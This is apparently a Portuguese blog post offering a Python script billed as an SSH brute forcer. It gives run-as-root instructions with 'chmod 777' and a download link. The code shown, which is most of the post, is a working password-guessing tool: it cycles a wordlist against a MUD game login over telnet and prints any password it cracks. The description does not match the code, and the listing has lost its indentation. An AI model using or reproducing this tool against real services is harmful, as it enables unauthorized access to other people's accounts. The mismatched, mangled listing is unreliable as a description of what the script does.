brutessh.py

Murro

Um simples “programa” para fazer força bruta na porta 22 (SSH), este aqui é feito em python, mas existem outrso feitos em C e até mesmo em perl.

Para executar é só entrar como root e digitar:
# chmod 777 brutessh2.py
# ./brutessh2.py

Link para donwload: https://disciplinas.dcc.ufba.br/pastas/MATA87/2008.1/PericiaForense/brutessh2.py

#!/usr/bin/python
import sys, string, socket
from telnetlib import Telnet

try:
host_name = sys.argv[1]
port = sys.argv[2]
ptarget = sys.argv[3]
fname = sys.argv[4]
except IndexError:
print “>> Usage: ./mudbf
sys.exit(1)

try:
arq = open(fname)
arq.close()
except IOError:
print “>> Password file does not exist!\n”
sys.exit(1)

print “\n _brute_force4MUD_”
print “”
print ” http://www.maxphil.cjb.net”
print ” by: Karl Phillip \n”
print ” : %s” % host_name
print ” : %s” % port
print ” : %s\n” % ptarget
print “>> Trying passwords.. (this could take a few minutes)\n”
arq = open(fname)
login_sucess = “*** PRESS RETURN:”
login_new =”Did I get that righ”

numtries = 0
looping = False
while not looping:

for line in arq.readlines():
passwd = line
numtries += 1
vict = Telnet(host_name, port)
vict.write(ptarget+”\n”)
vict.write(str(passwd)+”\n”)

response = vict.read_until(“Wrong password.”, 20)

if string.count(response, login_new):
print “\n=========================================”
print ” *PLAYER NOT FOUND* in this MUD!”
print “=========================================\n”
arq.close()
vict.close()
sys.exit(1)
elif string.count(response, login_sucess):
print “\n %d” % int(numtries)
print “\n*User*: %s” % ptarget
print “*Password*: %s” % passwd
vict.close()
sys.exit(1)
else:
#print “Trying passwd: %s” % passwd
vict.close()
vict.close()

looping = True

arq.close()
vict.close()
print “\n %d” % int(numtries)
print “\n=========================================”
print ” *NO PASSWORD* was found in that file!”
print “=====================================

  1. No trackbacks yet.

Deixe uma resposta

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do WordPress.com

Você está comentando utilizando sua conta WordPress.com. Sair / Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair / Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair / Alterar )

Foto do Google+

Você está comentando utilizando sua conta Google+. Sair / Alterar )

Conectando a %s

%d blogueiros gostam disto: